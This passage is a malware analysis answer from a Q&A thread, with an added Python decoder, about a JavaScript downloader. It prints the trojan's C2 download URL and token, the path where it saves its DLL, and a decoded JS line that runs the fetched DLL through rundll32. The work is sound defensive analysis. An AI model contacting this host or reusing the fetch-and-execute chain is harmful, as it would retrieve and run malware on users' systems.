The first part is still a hex string because it was doubly hex-encoded. It becomes VAR1 which is used in the next REQ call, to request https://dmnhulie.xyz/?1b5beaa0304aef2d175463d8b5e1cbe6ef45bf8b

So I requested that URL and got a copy of the real payload: a DLL containing the string "Crypter.dll" which matches the one described here:

https://www.virustotal.com/en/file/b13e274e8c191671fe58127b3d9461df16e10acc3ff02e698119e1e8eabd924e/analysis/

You can't just go directly to the final download URL. The 1b5beaa0304aef2d175463d8b5e1cbe6ef45bf8b token appears to be assigned for a single use only. When I tried to get it again, I got a 400 Bad Request error. You have to do the intermediate request, decode the small payload file with pos and len to get the 4-part response, and then you have a token you can use to download the real payload.

These results may not even be reproducible at all (although I did it 3 times and got the same DLL each time) because one of the major reasons for distributing a malware downloader is so you can cause different victims to download different payloads, or the same victim to download different payloads at different times.

I didn't analyze much after I got the DLL. The other 3 parts of the decoded trojan_payload appear to be a random filename where the DLL will be saved (VAR2 = \WizMouse\Page-Page.dll), a command line argument for the rundll32 call (VAR3 = 00001887), and another chunk of Javascript to call rundll32:

VAR6 =
GLOBAL['UTILS']['OBJ'][0](4).run('rundll32  '+ GLOBAL['UTILS']['VAR4'] + ',#1 ' + GLOBAL['UTILS']['VAR3'])
  • Wow, very complete answer, way more than I expected. Thank you a lot! As I said, I've reported the website I got this from and linked this question for details, as your answer is pretty great. Thanks again. – Zeh Jun 27 '16 at 02:40
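The following is an added example, not code from the question or from the answer above: a Python re-implementation of the two XOR layers the answer walks through, so the decoding can be checked offline without running the sample. It covers both the first-stage `decode()` (the `|`-separated values XORed against the script's own first line) and the second-stage `DEC()`/`UNP()` handling of the C2 response (4 hex chars of offset, one raw length byte, XORed body, then `|`-split and un-hexed). All input is constructed: the real key line is not reproduced on the page, so a placeholder key line and a padded fake "source" are used, and the repeating-key shape of the stage-2 XOR helper is an assumption (the answer only calls it "a string XOR function"). The host, ID, version string, token, DLL path and rundll32 argument are taken from the answer's own decoded output.

```python
import re

# --- stage 1: the script's decode(key, code) --------------------------------

def stage1_decode(key: str, code: str) -> str:
    """Mirror of decode(): `code` is '|'-separated decimal byte values; value i
    is XORed with the char code of key[i % len(key)]. In the real sample the key
    is the first 3669 bytes of the script's own source, so it begins with the
    apostrophe that opens line 1 (which is why 15 ^ 39 gives '(')."""
    return "".join(chr(int(v) ^ ord(key[i % len(key)]))
                   for i, v in enumerate(code.split("|")))

def stage1_encode(key: str, plaintext: str) -> str:
    """Inverse of stage1_decode; used only to build constructed sample input."""
    return "|".join(str(ord(c) ^ ord(key[i % len(key)]))
                    for i, c in enumerate(plaintext))

# --- stage 2: DEC(data) and UNP() on the C2 response -------------------------

def xor_cycle(key: str, data: str) -> str:
    """Assumed shape of the sample's XOR helper: repeating-key XOR."""
    return "".join(chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(data))

def stage2_dec(source: str, data: str) -> str:
    """Mirror of DEC(): data[0:4] is a hex offset into the script's own source,
    data[4] is the key length as a raw char code (so '4' means 52, not 4),
    and data[5:] is the XORed body."""
    pos = int(data[:4], 16)
    length = ord(data[4])
    key = source[pos:pos + length]
    if len(key) != length:
        raise ValueError("key window runs past the end of the source")
    return xor_cycle(key, data[5:])

def stage2_enc(source: str, pos: int, length: int, plaintext: str) -> str:
    """Inverse of stage2_dec; used only to build constructed sample input."""
    return f"{pos:04x}" + chr(length) + xor_cycle(source[pos:pos + length], plaintext)

def split_response(decoded: str) -> dict:
    """Mirror of the VAR1/VAR2/VAR3/VAR6 assignments: split on '|' and un-hex
    each part. The first part stays a hex string because it was hex-encoded twice."""
    parts = decoded.split("|")
    if len(parts) != 4:
        raise ValueError("expected 4 '|'-separated fields")
    token, dll_path, rundll_arg, js = (bytes.fromhex(p).decode("ascii") for p in parts)
    return {"token": token, "dll_path": dll_path, "rundll_arg": rundll_arg, "js": js}

def extract_c2(decoded_js: str):
    """Pull HOST, ID and V out of the IIFE's trailing argument list."""
    m = re.search(r'\}\)\(this,\s*"([^"]+)",\s*"([^"]+)",\s*"([^"]+)"\)', decoded_js)
    return m.groups() if m else None

# --- constructed sample data (the real key line is not reproduced on the page) --

SAMPLE_KEY_LINE = "'CONSTRUCTED_KEY_LINE_not_the_real_one';"   # constructed placeholder
SAMPLE_STAGE1_PLAIN = ('(function(GLOBAL, HOST, ID, V){ /* ... */ })'
                       '(this, "https://dmnhulie.xyz", '
                       '"b917aff9c439c45d78ac214d91e75186", "0.2.4_js")'
                       '["UTILS"]["RUN"]();')
# Fake source padded so that offset 0x1519 = 5401 holds the 52-byte key window
# the answer quotes; the real script's code string sits there.
SAMPLE_SOURCE = ("x" * 5401
                 + "2|52|4|63|65|9|113|95|69|10|47|66|13|90|39|31|71|48|"
                 + "x" * 64)
SAMPLE_RESPONSE_PARTS = [
    "1b5beaa0304aef2d175463d8b5e1cbe6ef45bf8b",
    "\\WizMouse\\Page-Page.dll",
    "00001887",
    "GLOBAL['UTILS']['OBJ'][0](4).run('rundll32  '+ GLOBAL['UTILS']['VAR4'] "
    "+ ',#1 ' + GLOBAL['UTILS']['VAR3'])",
]

def run_sample() -> dict:
    """Encode the constructed samples the way the malware expects, then decode
    them with the mirrored routines and return everything an analyst wants."""
    code = stage1_encode(SAMPLE_KEY_LINE, SAMPLE_STAGE1_PLAIN)
    stage1 = stage1_decode(SAMPLE_KEY_LINE, code)
    blob = stage2_enc(SAMPLE_SOURCE, 0x1519, 52,
                      "|".join(p.encode("ascii").hex() for p in SAMPLE_RESPONSE_PARTS))
    fields = split_response(stage2_dec(SAMPLE_SOURCE, blob))
    return {"stage1": stage1, "c2": extract_c2(stage1), "blob_prefix": blob[:5], **fields}

if __name__ == "__main__":
    for name, value in run_sample().items():
        print(f"{name}: {value!r}")
```

Two details worth checking against the answer: `stage1_encode("'i", "(f")` yields `15|15`, the first two values of the real `code` string, and the constructed stage-2 blob begins with `15194` because the length byte is `chr(52)`, i.e. the digit `4` by coincidence. To use this on a real sample, feed `stage1_decode` the script's first line as `key` and the `code` string as-is, and feed `stage2_dec` the script bytes read with CRLF line endings, as the answer notes, or the offset will not land on the right key.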